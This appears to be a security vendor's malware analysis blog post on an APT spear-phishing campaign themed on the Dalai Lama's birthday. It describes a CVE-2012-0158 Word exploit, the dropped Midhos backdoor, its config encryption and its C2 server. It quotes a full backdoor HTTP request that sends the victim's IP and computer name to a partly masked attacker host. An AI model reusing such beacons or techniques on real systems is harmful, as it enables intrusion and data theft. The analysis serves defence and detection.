A Gift for Dalai Lama’s Birthday

Recently, we wrote about Dalai Lama being a frequent Mac user. While this is true for his holiness, not all his supporters use Macs yet.

You may wonder why is this relevant? Well, on 6th of July, his holiness will be 77 years old, a kind of round number. There is no surprise that “Dalai Lama Birthday” attacks are already ongoing.

On July 3rd, we’ve noticed a new APT campaign entitled “Dalai Lama’s birthday on July 6 to be low-key affair”:

Attached to the e-mail there is a .DOC file which exploits CVE-2012-0158, a very common theme for these attacks. (see New APT Attack Shows Technical Advance in Exploit Development)

This time, the exploit is for Windows based computers.

The x86 shellcode in the .DOC file decrypts the main backdoor body in blocks of 1KB with a simple “xor pos + ror 3” cipher:

Once the main backdoor body is decrypted, it is dropped to disk as “CONIME.EXE”. This further drops a DLL (CONIME.DLL) and a configuration file (CONIME.INF). We currently detect the two dropped components as Trojan.Win32.Midhos:

CONIME.dll detected as Trojan.Win32.Midhos.fuy

CONIME.exe detected as Trojan.Win32.Midhos.fuz

The DLL implements the main backdoor functionality through three exported functions:

  • CommunicateToClient
  • InstallProgram
  • RunProgram

Just like in other cases, the backdoor configuration file (CONIME.INF) is encrypted:

The encryption algorithm here is different; it’s a loop which performs a XOR with a variable key.

Once decrypted, the backdoor config can be read:

The Command and Control server address (61.178.77.*) is exactly the same one used in a previous attack we analyzed. (see “New MacOS X backdoor variant used in APT attacks”)

The backdoor attempts to connect to the C2 via HTTP on port 1080, to a server side module named WinData{UWXYZ}.Dll:

Here’s a full HTTP request:

GET http://61.178.77.*:1080/WinData1158.Dll?HELO-STX-2*IP_ADDR*COMPUTERNAME*$ HTTP/1.0

In reply, the server answers with encrypted packets containing commands to the backdoor.

When the exploit is successful, a “fake” document is displayed instead, which contains an article ripped from “The Tribune, Chandigarh”, an Indian newspaper. The original article is written by “Lalit Mohan”:




High profile personalities like Tenzin Gyatso, the current Dalai Lama, are constant targets for APT attackers. With Dalai Lama’s 77th birthday coming up on July 6, we expect such attacks to intensify.

For the past month we’ve seen almost 500 reports of Trojan.Win32.Midhos, which is a family of backdoors used by these particular APT attackers.

The vast majority of victims are located in USA, Italy, Canada, UK and Germany.

Additionally, we have pointed in the past that many of these APT (Advanced Persistent Threat) attacks are not exactly “advanced”. In many cases, they are not so “persistent” either – they get detected very quickly by antivirus products and removed from the systems.

But one thing they are for sure – insistent.

Follow me on Twitter

A Gift for Dalai Lama’s Birthday

Your email address will not be published. Required fields are marked *


  1. G

    So there were 477 reports, of which 137 in the US, 56 in Italy, 19 in France, 16 in Poland, 11 in Spain and 10 in Belgium.


Lazarus targets defense industry with ThreatNeedle

In mid-2020, we realized that Lazarus was launching attacks on the defense industry using the ThreatNeedle cluster, an advanced malware cluster of Manuscrypt (a.k.a. NukeSped). While investigating this activity, we were able to observe the complete life cycle of an attack, uncovering more technical details and links to the group’s other campaigns.

Sunburst backdoor – code overlaps with Kazuar

While looking at the Sunburst backdoor, we discovered several features that overlap with a previously identified backdoor known as Kazuar. Our observations shows that Kazuar was used together with Turla tools during multiple breaches in past years.

Lazarus covets COVID-19-related intelligence

As the COVID-19 crisis grinds on, some threat actors are trying to speed up vaccine development by any means available. We have found evidence that the Lazarus group is going after intelligence that could help these efforts by attacking entities related to COVID-19 research.

Sunburst: connecting the dots in the DNS requests

We matched private and public DNS data for the SUNBURST-malware root C2 domain with the CNAME records, to identify who was targeted for further exploitation. In total, we analyzed 1722 DNS records, leading to 1026 unique target name parts and 964 unique UIDs.

Subscribe to our weekly e-mails

The hottest research right in your inbox